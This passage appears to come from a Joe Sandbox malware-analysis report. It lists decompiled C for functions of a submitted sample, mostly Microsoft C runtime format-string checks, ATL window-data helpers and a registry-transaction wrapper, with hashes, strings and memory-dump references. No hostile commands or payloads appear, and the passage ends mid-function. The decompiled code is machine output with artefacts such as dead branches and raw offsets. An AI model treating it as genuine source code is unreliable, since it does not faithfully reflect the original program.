                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiStringWide$AllocCheckFreeStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$nResult == nConvertedLen
                      • API String ID: 2571081082-1767654226
                      • Opcode ID: 698116f04a668e0d20ec8376277bc55a03d10b4371f8e058c75175d0915a7828
                      • Instruction ID: eeff575ac1bb27d0d1be044cb96a9b9cc2a99a5c5de75d6e246750c692a77b7f
                      • Opcode Fuzzy Hash: 698116f04a668e0d20ec8376277bc55a03d10b4371f8e058c75175d0915a7828
                      • Instruction Fuzzy Hash: 1E417176E40218AFCB50DFD9E846FEEB7B5AB88315F108219F9157B280D7749D84CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00990130 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00990130(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E0098FDB0(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xff458800
						_t13 = ( *_t10 << 4) + 0x474; // 0x97b1da
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00992F70(0))) = 0x16;
									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M009902B8))) {
								case 0:
									E00974910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00974B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00974AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00974B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x00990138
                      0x00990148
                      0x00990151
                      0x00990154
                      0x0099015b
                      0x00990169
                      0x00000000
                      0x00990169
                      0x0099015d
                      0x00990160
                      0x00990167
                      0x00990178
                      0x0099017e
                      0x0099018a
                      0x00990191
                      0x00990197
                      0x009901a5
                      0x009901a8
                      0x009901ab
                      0x00000000
                      0x00000000
                      0x009901b7
                      0x009901ba
                      0x009901c2
                      0x009901cb
                      0x009901ce
                      0x009901d2
                      0x00990231
                      0x00990233
                      0x0099023e
                      0x00990235
                      0x00990235
                      0x00990235
                      0x00990248
                      0x0099024b
                      0x0099024f
                      0x00990269
                      0x0099026e
                      0x00990271
                      0x00990274
                      0x00990276
                      0x00990276
                      0x00990274
                      0x00990277
                      0x0099027b
                      0x009902aa
                      0x0099019f
                      0x0099019f
                      0x009901a2
                      0x00000000
                      0x0099027d
                      0x00990282
                      0x0099029e
                      0x00000000
                      0x009902a6
                      0x0099027b
                      0x009901d7
                      0x00000000
                      0x009901e5
                      0x009901ea
                      0x00000000
                      0x00000000
                      0x009901f5
                      0x009901f9
                      0x00000000
                      0x00000000
                      0x00990209
                      0x0099020d
                      0x00000000
                      0x00000000
                      0x0099021d
                      0x00990229
                      0x0099022c
                      0x00000000
                      0x00000000
                      0x009901d7
                      0x00000000
                      0x009902af
                      0x00000000
                      0x00990167
                      0x00000000

                      Strings
                      • %ls, xrefs: 00990256
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00990262, 0099028F
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st, xrefs: 00990294
                      • ("Missing position in the format string", 0), xrefs: 00990251, 00990299
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-4110031974
                      • Opcode ID: 9b9d26443f5ad83a60f0f09bd5a9d25d2f891a9a909217997885fb8edf2331d3
                      • Instruction ID: dc01b5e22647e5a9e244902560a872314de55c7b0be60a5a345e5692d95c4d88
                      • Opcode Fuzzy Hash: 9b9d26443f5ad83a60f0f09bd5a9d25d2f891a9a909217997885fb8edf2331d3
                      • Instruction Fuzzy Hash: D9419DB0E04209EFCF04DF98C945BAEB3B5AFC5308F2081A9D0256B386C735AE01DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009902D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E009902D0(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E0098FE50(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xb60fff45
						_t13 = ( *_t10 << 4) + 0x474; // 0x97b9ec
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00992F70(0))) = 0x16;
									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M00990458))) {
								case 0:
									E00974910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00974B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00974AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00974B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x009902d8
                      0x009902e8
                      0x009902f1
                      0x009902f4
                      0x009902fb
                      0x00990309
                      0x00000000
                      0x00990309
                      0x009902fd
                      0x00990300
                      0x00990307
                      0x00990318
                      0x0099031e
                      0x0099032a
                      0x00990331
                      0x00990337
                      0x00990345
                      0x00990348
                      0x0099034b
                      0x00000000
                      0x00000000
                      0x00990357
                      0x0099035a
                      0x00990362
                      0x0099036b
                      0x0099036e
                      0x00990372
                      0x009903d1
                      0x009903d3
                      0x009903de
                      0x009903d5
                      0x009903d5
                      0x009903d5
                      0x009903e8
                      0x009903eb
                      0x009903ef
                      0x00990409
                      0x0099040e
                      0x00990411
                      0x00990414
                      0x00990416
                      0x00990416
                      0x00990414
                      0x00990417
                      0x0099041b
                      0x0099044a
                      0x0099033f
                      0x0099033f
                      0x00990342
                      0x00000000
                      0x0099041d
                      0x00990422
                      0x0099043e
                      0x00000000
                      0x00990446
                      0x0099041b
                      0x00990377
                      0x00000000
                      0x00990385
                      0x0099038a
                      0x00000000
                      0x00000000
                      0x00990395
                      0x00990399
                      0x00000000
                      0x00000000
                      0x009903a9
                      0x009903ad
                      0x00000000
                      0x00000000
                      0x009903bd
                      0x009903c9
                      0x009903cc
                      0x00000000
                      0x00000000
                      0x00990377
                      0x00000000
                      0x0099044f
                      0x00000000
                      0x00990307
                      0x00000000

                      Strings
                      • %ls, xrefs: 009903F6
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00990402, 0099042F
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00990434
                      • ("Missing position in the format string", 0), xrefs: 009903F1, 00990439
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-208977200
                      • Opcode ID: 360d9eb9acc4bb3abd28e1417b27e1d5e68955840ad7daafcbc1ae88b1ffba04
                      • Instruction ID: 4b90a7ad245560975a438879f86d4f8e1f9619ad7e6c4d04d215af4143c4bbf2
                      • Opcode Fuzzy Hash: 360d9eb9acc4bb3abd28e1417b27e1d5e68955840ad7daafcbc1ae88b1ffba04
                      • Instruction Fuzzy Hash: DF4191B0E44209EFCF04DF98C942BAEB7B5ABC4308F208569D11977342D775AE41DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0098FF90 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 113COMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E0098FF90(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t82;

				_v8 = __ecx;
				if((E0098FD10(_v8) & 0x000000ff) != 0) {
					_t66 = _v8;
					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
						L4:
						return 1;
					}
					_t74 = _v8;
					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
						_v28 = _v8 + 0x464;
						_t10 = _v8 + 0xaa4; // 0xb60fff45
						_t13 = ( *_t10 << 4) + 0x474; // 0x97a9ca
						_v32 = _v8 + _t13;
						_v12 = _v28;
						while(1) {
							__eflags = _v12 - _v32;
							if(_v12 == _v32) {
								break;
							}
							_t23 = _v8 + 0x14; // 0x8b18408b
							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
							_v16 =  *_v12;
							_v16 = _v16 - 1;
							__eflags = _v16 - 3;
							if(_v16 > 3) {
								__eflags = 0;
								if(0 == 0) {
									_v20 = 0;
								} else {
									_v20 = 1;
								}
								_v24 = _v20;
								__eflags = _v24;
								if(__eflags == 0) {
									_t59 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
									_t82 = _t82 + 0x18;
									__eflags = _t59 - 1;
									if(_t59 == 1) {
										asm("int3");
									}
								}
								__eflags = _v24;
								if(_v24 != 0) {
									L22:
									_t55 = _v12 + 0x10;
									__eflags = _t55;
									_v12 = _t55;
									continue;
								} else {
									 *((intOrPtr*)(L00992F70(0))) = 0x16;
									E00992900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
									return 0;
								}
							}
							switch( *((intOrPtr*)(_v16 * 4 +  &M00990118))) {
								case 0:
									E00974910(_v8 + 0x14);
									_t82 = _t82 + 4;
									goto L22;
								case 1:
									_v8 = _v8 + 0x14;
									__eax = E00974B30(_v8 + 0x14);
									goto L22;
								case 2:
									_v8 = _v8 + 0x14;
									__eax = E00974AF0(_v8 + 0x14);
									goto L22;
								case 3:
									_v8 = _v8 + 0x14;
									_v40 = E00974B10(_v8 + 0x14);
									_v36 = __edx;
									goto L22;
							}
						}
						return 1;
					}
					goto L4;
				}
				return 0;
			}

















                      0x0098ff98
                      0x0098ffa8
                      0x0098ffb1
                      0x0098ffb4
                      0x0098ffbb
                      0x0098ffc9
                      0x00000000
                      0x0098ffc9
                      0x0098ffbd
                      0x0098ffc0
                      0x0098ffc7
                      0x0098ffd8
                      0x0098ffde
                      0x0098ffea
                      0x0098fff1
                      0x0098fff7
                      0x00990005
                      0x00990008
                      0x0099000b
                      0x00000000
                      0x00000000
                      0x00990017
                      0x0099001a
                      0x00990022
                      0x0099002b
                      0x0099002e
                      0x00990032
                      0x00990091
                      0x00990093
                      0x0099009e
                      0x00990095
                      0x00990095
                      0x00990095
                      0x009900a8
                      0x009900ab
                      0x009900af
                      0x009900c9
                      0x009900ce
                      0x009900d1
                      0x009900d4
                      0x009900d6
                      0x009900d6
                      0x009900d4
                      0x009900d7
                      0x009900db
                      0x0099010a
                      0x0098ffff
                      0x0098ffff
                      0x00990002
                      0x00000000
                      0x009900dd
                      0x009900e2
                      0x009900fe
                      0x00000000
                      0x00990106
                      0x009900db
                      0x00990037
                      0x00000000
                      0x00990045
                      0x0099004a
                      0x00000000
                      0x00000000
                      0x00990055
                      0x00990059
                      0x00000000
                      0x00000000
                      0x00990069
                      0x0099006d
                      0x00000000
                      0x00000000
                      0x0099007d
                      0x00990089
                      0x0099008c
                      0x00000000
                      0x00000000
                      0x00990037
                      0x00000000
                      0x0099010f
                      0x00000000
                      0x0098ffc7
                      0x00000000

                      Strings
                      • %ls, xrefs: 009900B6
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 009900C2, 009900EF
                      • __crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_st, xrefs: 009900F4
                      • ("Missing position in the format string", 0), xrefs: 009900B1, 009900F9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<char,class __crt_stdio_output::stream_output_adapter<char> >::validate_and_update_st$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-2500556390
                      • Opcode ID: db6c7cb07524ef1b2128ff5c45050fac9aedc150d6f228836bc53598ee954691
                      • Instruction ID: 8ce12411df12e338e4d03f73d0c3397445edd777717f2c229197c26c0b0c24e8
                      • Opcode Fuzzy Hash: db6c7cb07524ef1b2128ff5c45050fac9aedc150d6f228836bc53598ee954691
                      • Instruction Fuzzy Hash: 3C41AFB0E08208EFCF14DF98D942BAEB775AFC1308F2085A9E1156B342D775AE41DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094BE20 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 54%
                      			E0094BE20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t30;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t46;
				void* _t48;
				intOrPtr _t61;
				void* _t65;
				void* _t68;
				void* _t69;

				_t66 = __esi;
				_t65 = __edi;
				_t48 = __ebx;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				if(_a4 == 0) {
					E009424B0(__esi, 0xc0000005, 1);
				}
				if(_a8 == 0) {
					L4:
					_t30 = L00994930(_t73, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x2094, 0, "%ls", L"pData != 0 && pObject != 0");
					_t69 = _t69 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
					L6:
					if(_a8 == 0 || _a12 == 0) {
						E009424B0(_t66, 0xc0000005, 1);
					}
					 *_a8 = _a12;
					_t67 = _t69;
					 *((intOrPtr*)(_a8 + 4)) = E009D1520(GetCurrentThreadId(), _t69 - _t69);
					_t61 = _a4 + 4;
					E00951D00(_t48,  &_v16, _t65, _t69, _t61, 0);
					_t35 = E00951D90( &_v16, _t69);
					_t78 = _t35;
					if(_t35 >= 0) {
						 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 0x1c));
						_t61 = _a4;
						 *((intOrPtr*)(_t61 + 0x1c)) = _a8;
						_t38 = E00951D60( &_v16);
					} else {
						_push("ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData\n");
						_push(0);
						_push(E0094F1E0(0xb33748));
						_push(E009423B0( &_v28, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209d));
						E009423E0(_t48, _t65, _t67, _t78);
						_t69 = _t69 + 0x10;
						if(0 == 0) {
							_t46 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209e, 0, "%ls", 0x9f40dc);
							_t69 = _t69 + 0x18;
							if(_t46 == 1) {
								asm("int3");
							}
						}
						_t38 = E00951D60( &_v16);
					}
					_push(_t61);
					E009D14C0(_t68, 0x94bf74);
					_t40 = _t38;
					return E009D1520(_t40, _t68 - _t69 + 0x18);
				}
				_t73 = _a12;
				if(_a12 != 0) {
					goto L6;
				}
				goto L4;
			}



















                      0x0094be20
                      0x0094be20
                      0x0094be20
                      0x0094be2c
                      0x0094be2f
                      0x0094be32
                      0x0094be35
                      0x0094be38
                      0x0094be3b
                      0x0094be42
                      0x0094be4b
                      0x0094be4b
                      0x0094be54
                      0x0094be5c
                      0x0094be74
                      0x0094be79
                      0x0094be7f
                      0x0094be81
                      0x0094be81
                      0x0094be82
                      0x0094be86
                      0x0094be95
                      0x0094be95
                      0x0094bea0
                      0x0094bea2
                      0x0094beb4
                      0x0094bebc
                      0x0094bec3
                      0x0094becb
                      0x0094bed0
                      0x0094bed2
                      0x0094bf3e
                      0x0094bf41
                      0x0094bf47
                      0x0094bf4d
                      0x0094bed4
                      0x0094bed4
                      0x0094bed9
                      0x0094bee5
                      0x0094bef8
                      0x0094bef9
                      0x0094befe
                      0x0094bf03
                      0x0094bf1d
                      0x0094bf22
                      0x0094bf28
                      0x0094bf2a
                      0x0094bf2a
                      0x0094bf28
                      0x0094bf2e
                      0x0094bf2e
                      0x0094bf52
                      0x0094bf5c
                      0x0094bf61
                      0x0094bf71
                      0x0094bf71
                      0x0094be56
                      0x0094be5a
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 0094BEA4
                      • _Smanip.LIBCPMTD ref: 0094BEF3
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094BF5C
                        • Part of subcall function 009424B0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 009424C2
                      Strings
                      • %ls, xrefs: 0094BE61, 0094BF0A
                      • ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData, xrefs: 0094BED4
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BEEB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094BE6D, 0094BF16
                      • pData != 0 && pObject != 0, xrefs: 0094BE5C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCurrentExceptionRaiseSmanipStackThreadVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData$pData != 0 && pObject != 0
                      • API String ID: 2312070509-3206224083
                      • Opcode ID: 51aece2d93672da98221d55876a70342ffc470a30e934d51910c9c307823e4e9
                      • Instruction ID: f17460eb95ea59d4fb26dc835e0f2bd8dbe783caf98b2f31f45918858e590e45
                      • Opcode Fuzzy Hash: 51aece2d93672da98221d55876a70342ffc470a30e934d51910c9c307823e4e9
                      • Instruction Fuzzy Hash: AC318370A40308ABDB14EF64DC42FAE7764AB94705F10C156FA09AA292E7B09A44CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00943200 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 106registrylibraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00943200(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				void* _t35;
				long _t40;
				_Unknown_base(*)()* _t43;
				void* _t49;
				void* _t50;
				void* _t72;
				void* _t73;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if( *_v8 == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 4));
					if(__eflags == 0) {
						L11:
						_t35 = 1;
						L12:
						return E009D1520(_t35, _t72 - _t73 + 0xc);
					}
					_t40 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					__eflags = _t73 - _t73;
					_t35 = E009D1520(_t40, __eflags);
					goto L12;
				}
				_v12 = E009D1520(GetModuleHandleA("Advapi32.dll"), _t73 - _t73);
				_t77 = _v12;
				if(_v12 == 0) {
					_t50 = L00994930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x27d, 0, "%ls", L"hAdvAPI32 != 0");
					_t73 = _t73 + 0x18;
					if(_t50 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					_t43 = GetProcAddress(_v12, "RegCreateKeyTransactedA");
					__eflags = _t73 - _t73;
